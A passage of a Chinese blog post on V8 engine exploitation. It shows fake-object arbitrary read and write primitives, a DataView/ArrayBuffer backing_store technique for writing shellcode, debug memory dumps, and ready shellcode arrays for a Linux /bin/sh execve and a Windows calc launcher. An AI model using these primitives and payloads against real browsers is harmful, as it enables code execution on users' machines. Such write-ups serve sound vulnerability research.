<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">| 32bit elements map | 32bit length | 64bit double_array_map | 64bit 0x4141414141414141 |element</span><br><span class="line">| 32bit fake_array map | 32bit properties | 32bit elements | 32bit length |JSArray</span><br></pre></td></tr></table></figure>

<p>接下来通过 addressOf 获取 fake_array 的地址，然后就能够计算出 double_array_map 的地址；再通过 fakeObject 将这个地址伪造成一个对象数组，对比下面的内存布局：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">| 32bit map addr | 32bit properties addr | 32bit elements addr | 32bit length |JSArray</span><br></pre></td></tr></table></figure>

<p>此处的 fake_array[0] 成为了 JSArray 的 map 和 properties ，fake_array[1] 被当作了 elements addr 和 length，通过修改 fake_array[1] 就能够使该 elements 指向任意地址，再访问 fakeObject[0] 即可读取该地址处的数据了(此处 double_array_map 需要对应为一个 double 数组的 map)</p>
<p>代码逻辑大致如下：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> fake_array=[double_array_map,<span class="title function_">int_to_float</span>(<span class="number">0x4141414141414141n</span>)];<span class="number">4</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">read64_addr</span>(<span class="params">addr</span>)</span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">var</span> fake_array_addr=<span class="title function_">addressOf</span>(fake_array);</span><br><span class="line">	<span class="keyword">var</span> fake_object_addr=fake_array_addr-<span class="number">0x10n</span>;</span><br><span class="line">	<span class="keyword">var</span> fake_object=<span class="title function_">fakeObject</span>(fake_object_addr);</span><br><span class="line">	fake_array[<span class="number">1</span>]=<span class="title function_">int_to_float</span>(addr-<span class="number">8n</span>+<span class="number">1n</span>);</span><br><span class="line">	<span class="keyword">return</span> fake_object[<span class="number">0</span>];</span><br><span class="line">	</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="任意地址写"><a href="#任意地址写" class="headerlink" title="任意地址写"></a>任意地址写</h2><p>同上一小节一样，只需要将最后的 return 修改为写入即可：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> fake_array=[double_array_map,<span class="title function_">int_to_float</span>(<span class="number">0x4141414141414141n</span>)];<span class="number">4</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">write64_addr</span>(<span class="params">addr,data</span>)</span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">var</span> fake_array_addr=<span class="title function_">addressOf</span>(fake_array);</span><br><span class="line">	<span class="keyword">var</span> fake_object_addr=fake_array_addr-<span class="number">0x10n</span>;</span><br><span class="line">	<span class="keyword">var</span> fake_object=<span class="title function_">fakeObject</span>(fake_object_addr);</span><br><span class="line">	fake_array[<span class="number">1</span>]=<span class="title function_">int_to_float</span>(addr-<span class="number">8n</span>+<span class="number">1n</span>);</span><br><span class="line">	fake_object[<span class="number">0</span>]=data;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="shellcode写入"><a href="#shellcode写入" class="headerlink" title="shellcode写入"></a>shellcode写入</h2><blockquote>
<p>设置的 elements 地址为 addr-8n+1n，我们想要写 shellcode 的地址一般都是内存段在开头，那么更前面的内存空间则是未开辟的，写入时会因为访问未开辟的内存空间发生异常。因此直接性的写入不太能够成功，但间接性的方法或许还是存在的，如果向某个对象中写入数据不需要经过 map 和 length，或许就能够顺利完成了。</p>
</blockquote>
<p>见如下代码</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> data_buf = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x10</span>);</span><br><span class="line"><span class="keyword">var</span> data_view = <span class="keyword">new</span> <span class="title class_">DataView</span>(data_buf);</span><br><span class="line">data_view.<span class="title function_">setFloat64</span>(<span class="number">0</span>, <span class="number">2.0</span>, <span class="literal">true</span>);</span><br><span class="line">%<span class="title class_">DebugPrint</span>(data_buf);</span><br><span class="line">%<span class="title class_">DebugPrint</span>(data_view);</span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br></pre></td></tr></table></figure>

<p>输出</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line">DebugPrint: 0x16eb080499b9: [JSArrayBuffer]</span><br><span class="line"> - map: 0x16eb08203271 &lt;Map(HOLEY_ELEMENTS)&gt; [FastProperties]</span><br><span class="line"> - prototype: 0x16eb081ca361 &lt;Object map = 0x16eb08203299&gt;</span><br><span class="line"> - elements: 0x16eb0800222d &lt;FixedArray[0]&gt; [HOLEY_ELEMENTS]</span><br><span class="line"> - embedder fields: 2</span><br><span class="line"> - backing_store: 0x559afc82d780</span><br><span class="line"> - byte_length: 16</span><br><span class="line"> - max_byte_length: 16</span><br><span class="line"> - detachable</span><br><span class="line"> - properties: 0x16eb0800222d &lt;FixedArray[0]&gt;</span><br><span class="line"> - All own properties (excluding elements): &#123;&#125;</span><br><span class="line"> - embedder fields = &#123;</span><br><span class="line">    0, aligned pointer: (nil)</span><br><span class="line">    0, aligned pointer: (nil)</span><br><span class="line"> &#125;</span><br><span class="line">0x16eb08203271: [Map]</span><br><span class="line"> - <span class="built_in">type</span>: JS_ARRAY_BUFFER_TYPE</span><br><span class="line"> - instance size: 64</span><br><span class="line"> - inobject properties: 0</span><br><span class="line"> - elements kind: HOLEY_ELEMENTS</span><br><span class="line"> - unused property fields: 0</span><br><span class="line"> - enum length: invalid</span><br><span class="line"> - stable_map</span><br><span class="line"> - back pointer: 0x16eb080023b5 &lt;undefined&gt;</span><br><span class="line"> - prototype_validity cell: 0x16eb08142405 &lt;Cell value= 1&gt;</span><br><span class="line"> - instance descriptors (own) <span class="comment">#0: 0x16eb080021c1 &lt;Other heap object (STRONG_DESCRIPTOR_ARRAY_TYPE)&gt;</span></span><br><span class="line"> - prototype: 0x16eb081ca361 &lt;Object map = 0x16eb08203299&gt;</span><br><span class="line"> - constructor: 0x16eb081ca28d &lt;JSFunction ArrayBuffer (sfi = 0x16eb08149bed)&gt;</span><br><span class="line"> - dependent code: 0x16eb080021b9 &lt;Other heap object (WEAK_FIXED_ARRAY_TYPE)&gt;</span><br><span class="line"> - construction counter: 0</span><br><span class="line"></span><br><span class="line">DebugPrint: 0x16eb080499f9: [JSDataView]</span><br><span class="line"> - map: 0x16eb08202ca9 &lt;Map(HOLEY_ELEMENTS)&gt; [FastProperties]</span><br><span class="line"> - prototype: 0x16eb081c8665 &lt;Object map = 0x16eb08202cd1&gt;</span><br><span class="line"> - elements: 0x16eb0800222d &lt;FixedArray[0]&gt; [HOLEY_ELEMENTS]</span><br><span class="line"> - embedder fields: 2</span><br><span class="line"> - buffer =0x16eb080499b9 &lt;ArrayBuffer map = 0x16eb08203271&gt;</span><br><span class="line"> - byte_offset: 0</span><br><span class="line"> - byte_length: 16</span><br><span class="line"> - properties: 0x16eb0800222d &lt;FixedArray[0]&gt;</span><br><span class="line"> - All own properties (excluding elements): &#123;&#125;</span><br><span class="line"> - embedder fields = &#123;</span><br><span class="line">    0, aligned pointer: (nil)</span><br><span class="line">    0, aligned pointer: (nil)</span><br><span class="line"> &#125;</span><br><span class="line">0x16eb08202ca9: [Map]</span><br><span class="line"> - <span class="built_in">type</span>: JS_DATA_VIEW_TYPE</span><br><span class="line"> - instance size: 56</span><br><span class="line"> - inobject properties: 0</span><br><span class="line"> - elements kind: HOLEY_ELEMENTS</span><br><span class="line"> - unused property fields: 0</span><br><span class="line"> - enum length: invalid</span><br><span class="line"> - stable_map</span><br><span class="line"> - back pointer: 0x16eb080023b5 &lt;undefined&gt;</span><br><span class="line"> - prototype_validity cell: 0x16eb08142405 &lt;Cell value= 1&gt;</span><br><span class="line"> - instance descriptors (own) <span class="comment">#0: 0x16eb080021c1 &lt;Other heap object (STRONG_DESCRIPTOR_ARRAY_TYPE)&gt;</span></span><br><span class="line"> - prototype: 0x16eb081c8665 &lt;Object map = 0x16eb08202cd1&gt;</span><br><span class="line"> - constructor: 0x16eb081c8461 &lt;JSFunction DataView (sfi = 0x16eb081482c9)&gt;</span><br><span class="line"> - dependent code: 0x16eb080021b9 &lt;Other heap object (WEAK_FIXED_ARRAY_TYPE)&gt;</span><br><span class="line"> - construction counter: 0</span><br></pre></td></tr></table></figure>

<p>可以注意到<code>JSDataView</code>的<code>buffer</code>指向了<code>JSArrayBuffer</code>，而<code>JSArrayBuffer</code>的 <code>backing_store</code>则指向了实际的数据储存地址，那么如果我们能够写<code>backing_store</code>为 <code>shellcode</code>内存段，就可以通过<code>JSDataView</code>的<code>setFloat64</code>方法直接写入了</p>
<h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><p>shellcode</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//Linux x64</span></span><br><span class="line"><span class="keyword">var</span> shellcode = [  </span><br><span class="line">  <span class="number">0x2fbb485299583b6an</span>,  </span><br><span class="line">  <span class="number">0x5368732f6e69622fn</span>,  </span><br><span class="line">  <span class="number">0x050f5e5457525f54n</span>  </span><br><span class="line">];  </span><br><span class="line"></span><br><span class="line"><span class="comment">//Windows 计算器</span></span><br><span class="line"><span class="keyword">var</span> shellcode = [  </span><br><span class="line">	<span class="number">0xc0e8f0e48348fcn</span>,  </span><br><span class="line">	<span class="number">0x5152504151410000n</span>,  </span><br><span class="line">	<span class="number">0x528b4865d2314856n</span>,  </span><br><span class="line">	<span class="number">0x528b4818528b4860n</span>,  </span><br><span class="line">	<span class="number">0xb70f4850728b4820n</span>,  </span><br><span class="line">	<span class="number">0xc03148c9314d4a4an</span>,  </span><br><span class="line">	<span class="number">0x41202c027c613cacn</span>,  </span><br><span class="line">	<span class="number">0xede2c101410dc9c1n</span>,  </span><br><span class="line">	<span class="number">0x8b20528b48514152n</span>,  </span><br><span class="line">	<span class="number">0x88808bd001483c42n</span>,  </span><br><span class="line">	<span class="number">0x6774c08548000000n</span>,  </span><br><span class="line">	<span class="number">0x4418488b50d00148n</span>,  </span><br><span class="line">	<span class="number">0x56e3d0014920408bn</span>,  </span><br><span class="line">	<span class="number">0x4888348b41c9ff48n</span>,  </span><br><span class="line">	<span class="number">0xc03148c9314dd601n</span>,  </span><br><span class="line">	<span class="number">0xc101410dc9c141acn</span>,  </span><br><span class="line">	<span class="number">0x244c034cf175e038n</span>,  </span><br><span class="line">	<span class="number">0x4458d875d1394508n</span>,  </span><br><span class="line">	<span class="number">0x4166d0014924408bn</span>,  </span><br><span class="line">	<span class="number">0x491c408b44480c8bn</span>,  </span><br><span class="line">	<span class="number">0x14888048b41d001n</span>,  </span><br><span class="line">	<span class="number">0x5a595e58415841d0n</span>,  </span><br><span class="line">	<span class="number">0x83485a4159415841n</span>,  </span><br><span class="line">	<span class="number">0x4158e0ff524120ecn</span>,  </span><br><span class="line">	<span class="number">0xff57e9128b485a59n</span>,  </span><br><span class="line">	<span class="number">0x1ba485dffffn</span>,  </span><br><span class="line">	<span class="number">0x8d8d480000000000n</span>,  </span><br><span class="line">	<span class="number">0x8b31ba4100000101n</span>,  </span><br><span class="line">	<span class="number">0xa2b5f0bbd5ff876fn</span>,  </span><br><span class="line">	<span class="number">0xff9dbd95a6ba4156n</span>,  </span><br><span class="line">	<span class="number">0x7c063c28c48348d5n</span>,  </span><br><span class="line">	<span class="number">0x47bb0575e0fb800an</span>,  </span><br><span class="line">	<span class="number">0x894159006a6f7213n</span>,  </span><br><span class="line">	<span class="number">0x2e636c6163d5ffdan</span>,  </span><br><span class="line">	<span class="number">0x657865n</span>,  </span><br><span class="line">];</span><br></pre></td></tr></table></figure>

<p>其他函数</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">  </span><br><span class="line"><span class="keyword">function</span> <span class="title function_">float_to_int</span>(<span class="params">f</span>)  </span><br><span class="line">&#123;  </span><br><span class="line">  f64[<span class="number">0</span>] = f;  </span><br><span class="line">    <span class="keyword">return</span> bigUint64[<span class="number">0</span>];  </span><br><span class="line">&#125;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">function</span> <span class="title function_">int_to_float</span>(<span class="params">i</span>)  </span><br><span class="line">&#123;  </span><br><span class="line">    bigUint64[<span class="number">0</span>] = i;  </span><br><span class="line">    <span class="keyword">return</span> f64[<span class="number">0</span>];  </span><br><span class="line">&#125;  </span><br></pre></td></tr></table></figure>


</div> 

<script>
    window.onload = detectors();
</script>
    <div class="post-footer">
    <div class="h-line-primary"></div>
    <nav class="post-nav">
        <div class="prev-item">
           
                <div class="icon arrow-left"></div>
                <div class="post-link">
                    <a href="/2024/07/29/%E3%80%90V8%E3%80%91CVE-2020-6507%E5%A4%8D%E7%8E%B0/">Prev</a>
                </div>
            
        </div>
        <div class="next-item">
            
                <div class="icon arrow-right"></div>
                <div class="post-link">
                  <a href="/2024/07/24/%E3%80%90V8%E3%80%91V8%E7%A0%94%E7%A9%B6%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">Next</a>  
                </div>  
            
        </div>
    </nav>
</div>

    
      <div class="post-comment">

    
        <div id="vcomments"></div>
        <script>
            var META = ['nick', 'mail', 'link'];
            var meta = 'nick,mail';
            meta = meta.split(',').filter(item => {
                return META.includes(item);
            });
            new Valine({
                el: '#vcomments',
                appId: 'rb5WOYmmPvNLWkXLJIiqi1p0-gzGzoHsz',
                appKey: 'B0j55vucTVteHiiUJeIL8Vx8',
                lang: 'zh-CN',
                placeholder: '这里是评论区:)',
                avatar: '/favicon.png',
                meta: meta
            })
        </script>    
     

     
    
    

</div>
     
  
</article>
        </div>
      </div>
      
      <div class="footer">
    <div class="flex-container">
        <div class="footer-text">
            
            
            
                Powered by <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & <a target="_blank" rel="noopener" href="https://github.com/zoeingwingkei/frame/">Frame</a>
                
        </div>
    </div>
</div>

    </div>

    
      <div class="search-popup">
    <div class="search-popup-overlay">  
    </div>
    <div class="search-popup-window" >
        <div class="search-header">
            <div class="search-input-container">
              <input autocomplete="off" autocapitalize="off" maxlength="80"
                     placeholder="Search Anything" spellcheck="false"
                     type="search" class="search-input">
            </div>
            <div class="search-close-btn">
                <div class="icon close-btn"></div>
            </div>
        </div>
        <div class="search-result-container">
        </div>
    </div>
</div>

<script>
    const searchConfig = {
        path             : "/search.xml",
        top_n_per_article: "1",
        unescape         : "false",
        trigger: "auto",
        preload: "false"
    }
</script>
<script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js"></script>
<script src="/js/search.js"></script>
    
    

  <!-- hexo injector body_end start -->
  <script data-pjax src="https://cdn.jsdelivr.net/gh/Zfour/hexo-github-calendar@1.21/hexo_githubcalendar.js"></script>
  <script data-pjax>
        function GithubCalendarConfig(){
            var git_githubapiurl ="https://python-github-calendar-api.vercel.app/api?Loora1N";
            var git_color =['#ebedf0', '#fdcdec', '#fc9bd9', '#fa6ac5', '#f838b2', '#f5089f', '#c4067e', '#92055e', '#540336', '#48022f', '#30021f'];
            var git_user ="Loora1N";
            var parent_div_git = document.getElementById('recent-posts');
            var git_div_html = '<div class="recent-post-item" style="width:100%;height:auto;padding:10px;"><div id="github_loading" style="width:10%;height:100%;margin:0 auto;display: block"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"  viewBox="0 0 50 50" style="enable-background:new 0 0 50 50" xml:space="preserve"><path fill="#d0d0d0" d="M25.251,6.461c-10.318,0-18.683,8.365-18.683,18.683h4.068c0-8.071,6.543-14.615,14.615-14.615V6.461z" transform="rotate(275.098 25 25)"><animateTransform attributeType="xml" attributeName="transform" type="rotate" from="0 25 25" to="360 25 25" dur="0.6s" repeatCount="indefinite"></animateTransform></path></svg></div><div id="github_container"></div></div>';
            if(parent_div_git && location.pathname =='/about/'){
                console.log('已挂载github calendar')
                // parent_div_git.innerHTML=git_div_html+parent_div_git.innerHTML // 无报错，但不影响使用(支持pjax跳转)
                parent_div_git.insertAdjacentHTML("afterbegin",git_div_html) // 有报错，但不影响使用(支持pjax跳转)
            };
            GithubCalendar(git_githubapiurl,git_color,git_user)
        }
        if(document.getElementById('recent-posts')){
            GithubCalendarConfig()
        }
    </script>
    <style>#github_container{min-height:280px}@media screen and (max-width:650px) {#github_container{background-image:;min-height:0px}}</style>
    <style></style><!-- hexo injector body_end end --></body>
</html>
